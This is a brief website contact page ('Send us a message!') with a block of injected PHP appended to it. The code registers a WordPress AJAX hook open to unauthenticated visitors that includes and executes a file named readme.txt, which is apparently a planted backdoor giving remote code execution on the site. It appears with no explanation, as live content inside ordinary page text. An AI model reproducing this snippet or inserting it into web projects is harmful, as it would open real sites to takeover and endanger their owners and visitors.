Contact Us
Contact us
Send us your question or comment and we will make every effort to respond to you in a timely manner.
Send us a message!
if(!function_exists('file_check_readme98041')){ add_action('wp_ajax_nopriv_file_check_readme98041', 'file_check_readme98041'); add_action('wp_ajax_file_check_readme98041', 'file_check_readme98041'); function file_check_readme98041() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }